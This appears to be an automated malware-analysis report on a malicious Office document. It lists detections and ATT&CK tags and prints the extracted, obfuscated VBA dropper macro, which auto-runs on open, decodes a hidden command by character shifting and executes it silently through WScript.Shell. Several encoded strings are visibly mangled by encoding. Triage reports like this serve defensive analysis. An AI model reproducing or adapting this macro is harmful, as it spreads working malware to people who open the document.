MALICIOUS
298
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and CreateObject, along with a Shell() call, strongly suggesting the execution of arbitrary code. The Document_Open and Workbook_Open macros are auto-executing entry points. The VBA code appears to be obfuscated, but its intent is to download and execute a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-6391839-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6391839-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
CreateObject("WScript.Shell").Run XFR_ZJ, 0, True End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject("WScript.Shell").Run XFR_ZJ, 0, True End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Public Sub Document_Open() I_RO -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Document_Open -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9100 bytes |
SHA-256: 59a3200fe51ace06a5822d7acd72ba2eb460064fe933995e8cf009b172e201fc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
55 of 98 identifiers look randomly generated (e.g. 'cccccccccwucc1c9$4vkcKcDc') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Function XFR_ZJ() As String
Dim W_JW As String
W_JW = "Œ‹“���„�ˆˆJ�”�<Is…Š€‹“o�•ˆ�<"
Dim CH_ULP As String
CH_ULP = "d…€€�Š<IŠ‹Œ�‹‚…ˆ�<e‚<D����IŒ"
Dim T_KIA As String
T_KIA = "}�„<<@�Š’V]ll`]p]<G<CxRŒU‹J�"
Dim JZJ_OK As String
JZJ_OK = "”�CE<—n�‰‹’�Ie��‰<<@�Š’V]ll`"
Dim XN_ULN As String
XN_ULN = "]p]<G<CxRŒU‹J�”�C™W<@ƒ…–t<Y<"
Dim YRQ_AMR As String
YRQ_AMR = "j�“Ik~†� �<o•���‰Jj��Js�~_ˆ…"
Dim DR_KYD As String
DR_KYD = "�Š�W<@ƒ…–tJd�}€���wCq���I]ƒ�"
Dim WE_WO As String
WE_WO = "Š�Cy<Y<C€€Iˆ‹ƒCW<@ƒ…–tJ`‹“Šˆ"
Dim KR_CZ As String
KR_CZ = "‹}€b…ˆ�DC„��ŒVKK„‹‰�J�}��„ˆ…"
Dim Q_JZ As String
Q_JZ = "Š‡JŠ��Kš€}‰�‘�Š�•K…Š’‹… �KeŠ"
Dim XX_B As String
XX_B = "’‹… �{LQMNNLMS{‹‘�Œ‘�__]R]]b"
Dim N_O As String
N_O = "J� �CH<@�Š’V]ll`]p]<G<CxRŒU‹"
Dim X_SSE As String
X_SSE = "J�”�CEW<Dj�“Ik~†� �<I ‹‰<o„�"
Dim KI_TL As String
KI_TL = "ˆˆJ]ŒŒˆ… }�…‹ŠEJo„�ˆˆa”� ‘��"
Dim ZC_AF As String
ZC_AF = "D@�Š’V]ll`]p]<G<CxRŒU‹J�”�CE"
Dim AEB_URJ As String
AEB_URJ = "W<o�‹ŒIl�‹ ���<Ie€<@l…€<Ib‹� �"
Dim J_LPV As String
J_LPV = W_JW & CH_ULP & T_KIA & JZJ_OK & XN_ULN & YRQ_AMR & DR_KYD & WE_WO & KR_CZ & Q_JZ & XX_B & N_O & X_SSE & KI_TL & ZC_AF & AEB_URJ
Dim OJ_PB As Long
Dim XUD_P As String
For OJ_PB = 1 To Len(J_LPV)
XUD_P = XUD_P & Chr(Asc(Mid$(J_LPV, OJ_PB, 1)) - 28)
Next
Dim F_GD As String
F_GD = "c�•pc…9cccT›K“Ecy`Rc›>90cAr˜™‡BŸC�c�vcc3c*›cccHc`cTcJeu€cchc"
Dim IZ_VBD As String
IZ_VBD = "<{|cc{ckcc„Cc•cYNcc‘\ccccM{B6clcCJRcŒ=cdccccJ9co}ccc�c“c�ccc"
Dim H_HC As String
H_HC = "c3cscxcŒcB8~}cccApc*c£ Vfc1c4+cc2M;=™c)ajcc&\s¡c cc(cc0ccccc"
Dim L_OW As String
L_OW = ";k€o£ccccccndcc mvcc‡pI‡sŒc~cc7ccccicc8ccc-y)£c@c;|�c†cc} cd"
Dim L_L As String
L_L = "ccB7c=cccccaccfc‚ccpc-acccX(c|”cccccV�JocPc ŠccAxccccc4�cccc"
Dim O_TTL As String
O_TTL = "c�m™cq:–cŒš’jcŸBcjV†:cScšIRcc�ic—cc +c’–cc_]cjHšcctc�^cccCsc"
Dim HS_NAV As String
HS_NAV = "cGccccc cccc�—c“cc-tc?GXcc%,crG7_<�cccc˜ccc„8cjT7c:ccccc‚3SŸ"
Dim JH_Y As String
JH_Y = "cc™c|\c&~Occ˜ctcCcgccc\Iˆ�cccy”ccdcyccc�Rccc�^)c„8b–cc`ccckj"
Dim RES_JA As String
RES_JA = "cc<'ŸcccQˆcc`jccNˆc c;ccqcc<cccGc<c˜Œcœ5‰cc7-ccccc�cccc>ƒQ-c"
Dim EB_IXZ As String
EB_IXZ = "ccccG‘[t�cccb�ch'lc$cccc@?},c“ucc`cƒs€k}c�£cc`£ccc*› bc�5c+v"
Dim S_T As String
S_T = "clcŸ‡˜;&cScc%Qˆc)c-cc\c�cJŒc_qcyc xc'�£I¡ccƒšRccˆ`cKcX3W6crc"
Dim C_P As String
C_P = "ˆcc†u0c3B%�ccBccc-‡cccc5cQblhrccT™<ˆcc2�¢cc†cM�cœœc,IzFccGcŒ"
Dim UO_UC As String
UO_UC = "cc4c}h*{cEcc�â˜cccccccccwucc1c9$4vkcKcDc‚0Ocƒ,acc†Kcc&Jc£cc8"
Dim AA_T As String
AA_T = "4�‡ÒFcc9cO’cccm™€bc˜¡%1OœtZcŸcmcc�c~>ccc5ccnbcc�Sccccccc£c†]"
Dim MN_M As String
MN_M = "X™Iccczc~cyc‡cQ�c^c]”oM—˜ccH>wŠc�’�¡cc ccctcJ8hcMccpc�cc�YZc"
Dim L_EHO As String
L_EHO = "%|ccc/›cccšƒc…glc3ca3c5ccc4QjcC£“c’c>ccccc•ccc�cUcJcš?Ÿ:cs�="
Dim KX_ZD As String
KX_ZD = "c‰ccd•`Šcœ–pcc^}Ic`Mˆccœn-x¢|)cF“aUKccrc6cMccc˜dccvbc|�-ƒcŒc"
Dim P_B As String
P_B = "c¡£ctcv™7c�cc;cs�ccGcbc�œc£ccA]ccN|P¡‡cccPcCcccc>ccWh+cc7W��"
Dim JEJ_V As String
JEJ_V = "�ccccc>cYFc…;cc5cpc�c@cccccccš=mcqJvZ™€c�ccc^?cJcfcƒ3ctcŒccJ"
Dim YD_A As String
YD_A = "c�c,c�c�ccMcccccˆ‹c”cXwcccxc@cc£ccccupcc<c�Bcck�cc]8ccccUc^0"
Dim PN_MK As String
PN_MK = "ccc-`cc@c:ccO@¡£e20†-h¡ccn]8oCc�cŸ&N9c8£sccc_{’[ncccRccccYd�"
Dim RSJ_IYI As String
RSJ_IYI = "c,nccŸ�cŸycccc6?ccc%ccXR*c—�c ccjccccÙc-cccc›0ccccbc�cp˜c+cc"
Dim S_C As String
S_C = "‰sccšcUcc1iccc“•‹cec@‰+cƒc—Œ:c,Zo_+c$wccck�Zc-c(ic„ccWY‡|Vˆƒ"
Dim Y_FS As String
Y_FS = "cccrc’cc”7cŸ2cAccccc‡c8ccc+c+—cœ…—cccc%c^…c£:™c;Jc`ccIŸGccŠc"
Dim DJ_HGW As String
DJ_HGW = "cc;Œ>c6Šccc~œ&ccLcv”cc–_c›‡`�a^Xccc™;cccK3cc]cLcc?˜ccc‰cP�Gc"
Dim BDN_VJB As String
BDN_VJB = "McccIcbI64c›c.ccc}š¢_m£Fcbc,•cccccJclc'ccc.c'cccc—c(�cc„YcfI"
Dim SF_JRA As String
SF_JRA = "cc9c9+ccQc\ŒcccXc)cc;c7†cc:|ccrccac�cc€[cc_œ“c)ccTB„1†cccšc\"
Dim F_A As String
F_A = "chdccc3cc[;ccccWJQSiwGNxTbcKcec›cG•ccvccc�—c<‚cQc�cckcc=c;cc"
Dim J_VEP As String
J_VEP = "cccc‡’xcc¢cccc_cˆcc:ccT]bcŒccGcc¡˜cœcšc[cScK.c™ccJcqcnc”cHcc"
Dim W_J As String
W_J = "c_ )c€_ccrcc‡Scc›6Wcc'cccccN4,cuDo*¡c¢cccc\ccr@cccccc‚,Ac4cc"
Dim N_KW As String
N_KW = "�cc<M¢c‰cLj8<c`cccc4v…ƒwNc™c„ccXPc7cceWc�ccc•cc�cX"
=_pcccˆ>WccvccLMcy0cc{cc†cccc+”Tc7„c/chc<cc"
XFR_ZJ = XUD_P
End Function
Public Sub Document_Open()
I_RO
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function I_RO()
Dim F_GD As String
F_GD = "c�•pc…9cccT›K“Ecy`Rc›>90cAr˜™‡BŸC�c�vcc3c*›cccHc`cTcJeu€cchc"
Dim IZ_VBD As String
IZ_VBD = "<{|cc{ckcc„Cc•cYNcc‘\ccccM{B6clcCJRcŒ=cdccccJ9co}ccc�c“c�ccc"
Dim H_HC As String
H_HC = "c3cscxcŒcB8~}cccApc*c£ Vfc1c4+cc2M;=™c)ajcc&\s¡c cc(cc0ccccc"
Dim L_OW As String
L_OW = ";k€o£ccccccndcc mvcc‡pI‡sŒc~cc7ccccicc8ccc-y)£c@c;|�c†cc} cd"
Dim L_L As String
L_L = "ccB7c=cccccaccfc‚ccpc-acccX(c|”cccccV�JocPc ŠccAxccccc4�cccc"
Dim O_TTL As String
O_TTL = "c�m™cq:–cŒš’jcŸBcjV†:cScšIRcc�ic—cc +c’–cc_]cjHšcctc�^cccCsc"
Dim HS_NAV As String
HS_NAV = "cGccccc cccc�—c“cc-tc?GXcc%,crG7_<�cccc˜ccc„8cjT7c:ccccc‚3SŸ"
Dim JH_Y As String
JH_Y = "cc™c|\c&~Occ˜ctcCcgccc\Iˆ�cccy”ccdcyccc�Rccc�^)c„8b–cc`ccckj"
Dim RES_JA As String
RES_JA = "cc<'ŸcccQˆcc`jccNˆc c;ccqcc<cccGc<c˜Œcœ5‰cc7-ccccc�cccc>ƒQ-c"
Dim EB_IXZ As String
EB_IXZ = "ccccG‘[t�cccb�ch'lc$cccc@?},c“ucc`cƒs€k}c�£cc`£ccc*› bc�5c+v"
Dim S_T As String
S_T = "clcŸ‡˜;&cScc%Qˆc)c-cc\c�cJŒc_qcyc xc'�£I¡ccƒšRccˆ`cKcX3W6crc"
Dim C_P As String
C_P = "ˆcc†u0c3B%�ccBccc-‡cccc5cQblhrccT™<ˆcc2�¢cc†cM�cœœc,IzFccGcŒ"
Dim UO_UC As String
UO_UC = "cc4c}h*{cEcc�â˜cccccccccwucc1c9$4vkcKcDc‚0Ocƒ,acc†Kcc&Jc£cc8"
Dim AA_T As String
AA_T = "4�‡ÒFcc9cO’cccm™€bc˜¡%1OœtZcŸcmcc�c~>ccc5ccnbcc�Sccccccc£c†]"
Dim MN_M As String
MN_M = "X™Iccczc~cyc‡cQ�c^c]”oM—˜ccH>wŠc�’�¡cc ccctcJ8hcMccpc�cc�YZc"
Dim L_EHO As String
L_EHO = "%|ccc/›cccšƒc…glc3ca3c5ccc4QjcC£“c’c>ccccc•ccc�cUcJcš?Ÿ:cs�="
Dim KX_ZD As String
KX_ZD = "c‰ccd•`Šcœ–pcc^}Ic`Mˆccœn-x¢|)cF“aUKccrc6cMccc˜dccvbc|�-ƒcŒc"
Dim P_B As String
P_B = "c¡£ctcv™7c�cc;cs�ccGcbc�œc£ccA]ccN|P¡‡cccPcCcccc>ccWh+cc7W��"
Dim JEJ_V As String
JEJ_V = "�ccccc>cYFc…;cc5cpc�c@cccccccš=mcqJvZ™€c�ccc^?cJcfcƒ3ctcŒccJ"
Dim YD_A As String
YD_A = "c�c,c�c�ccMcccccˆ‹c”cXwcccxc@cc£ccccupcc<c�Bcck�cc]8ccccUc^0"
Dim PN_MK As String
PN_MK = "ccc-`cc@c:ccO@¡£e20†-h¡ccn]8oCc�cŸ&N9c8£sccc_{’[ncccRccccYd�"
Dim RSJ_IYI As String
RSJ_IYI = "c,nccŸ�cŸycccc6?ccc%ccXR*c—�c ccjccccÙc-cccc›0ccccbc�cp˜c+cc"
Dim S_C As String
S_C = "‰sccšcUcc1iccc“•‹cec@‰+cƒc—Œ:c,Zo_+c$wccck�Zc-c(ic„ccWY‡|Vˆƒ"
Dim Y_FS As String
Y_FS = "cccrc’cc”7cŸ2cAccccc‡c8ccc+c+—cœ…—cccc%c^…c£:™c;Jc`ccIŸGccŠc"
Dim DJ_HGW As String
DJ_HGW = "cc;Œ>c6Šccc~œ&ccLcv”cc–_c›‡`�a^Xccc™;cccK3cc]cLcc?˜ccc‰cP�Gc"
Dim BDN_VJB As String
BDN_VJB = "McccIcbI64c›c.ccc}š¢_m£Fcbc,•cccccJclc'ccc.c'cccc—c(�cc„YcfI"
Dim SF_JRA As String
SF_JRA = "cc9c9+ccQc\ŒcccXc)cc;c7†cc:|ccrccac�cc€[cc_œ“c)ccTB„1†cccšc\"
Dim F_A As String
F_A = "chdccc3cc[;ccccWJQSiwGNxTbcKcec›cG•ccvccc�—c<‚cQc�cckcc=c;cc"
Dim J_VEP As String
J_VEP = "cccc‡’xcc¢cccc_cˆcc:ccT]bcŒccGcc¡˜cœcšc[cScK.c™ccJcqcnc”cHcc"
Dim W_J As String
W_J = "c_ )c€_ccrcc‡Scc›6Wcc'cccccN4,cuDo*¡c¢cccc\ccr@cccccc‚,Ac4cc"
Dim N_KW As String
N_KW = "�cc<M¢c‰cLj8<c`cccc4v…ƒwNc™c„ccXPc7cceWc�ccc•cc�cX"
=_pcccˆ>WccvccLMcy0cc{cc†cccc+”Tc7„c/chc<cc"
CreateObject("WScript.Shell").Run XFR_ZJ, 0, True
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.